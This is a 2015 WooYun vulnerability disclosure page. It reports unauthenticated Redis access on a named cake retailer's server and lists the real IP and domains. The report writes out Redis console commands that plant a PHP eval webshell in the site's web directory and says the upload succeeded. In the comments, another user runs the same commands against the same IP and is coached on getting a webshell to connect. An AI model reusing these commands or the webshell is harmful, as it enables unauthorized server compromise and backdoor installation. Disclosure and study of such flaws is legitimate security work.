当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136891

漏洞标题:廿一客某重要服务器配置不当getshell

相关厂商:21cake.com

漏洞作者: 爱上襄阳

提交时间:2015-08-25 17:16

修复时间:2015-08-30 17:18

公开时间:2015-08-30 17:18

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

廿一客某重要服务器配置不当getshell

详细说明:

甘一客的蛋糕看起来真的好精美·正题:
http://www.mescake.com/、http://touch.mescake.com/ 沦陷
210.51.166.149服务器getshell
redis未授权访问,210.51.166.149

1.png


尝试console写shell
1、找网站目录,同一IP上的一域名http://weixin.21cake.com/info.php,找到了网站目录

1.png


2、尝试getshell

config set dir /www/we/
config set dbfilename 500.php
set hello "<?php @eval($_POST[cc])?>"
save


这里格式问题纠结了很久,最后终于上传成功了

QQ截图20150825170547.png

漏洞证明:

QQ截图20150825170747.png

修复方案:

授权认证

版权声明:转载请注明来源 爱上襄阳@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-30 17:18

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-04 16:38 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    Connected.210.51.166.149:0>config set dir /www/we/OK210.51.166.149:0>config set dbfilename test.phpOK210.51.166.149:0>set webshell "<?php phpinfo();?>"ERR syntax error210.51.166.149:0>ERR syntax error是为什么?

  2. 2015-09-04 16:38 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @爱上襄阳

  3. 2015-09-05 03:05 | 1937nick ( 实习白帽子 | Rank:97 漏洞数:32 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    @进击的zjx http://wooyun.org/bugs/wooyun-2010-0133489 这里详细点

  4. 2015-09-05 16:00 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @1937nick 我也看了一些redis getshell,但我上传phpinfo()可以解析,传一句话就不行,连不上。。这是为什么呢?

  5. 2015-09-05 17:40 | 1937nick ( 实习白帽子 | Rank:97 漏洞数:32 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    @进击的zjx 你的写目录确定没有写错? 有时候数据过大写了也了马也解析不了

  6. 2015-09-05 18:50 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @1937nick 我就照这个洞主的目录一模一样写的- -!我就写一句话,但是传上去的很多乱码,有两页这样。。不知道为什么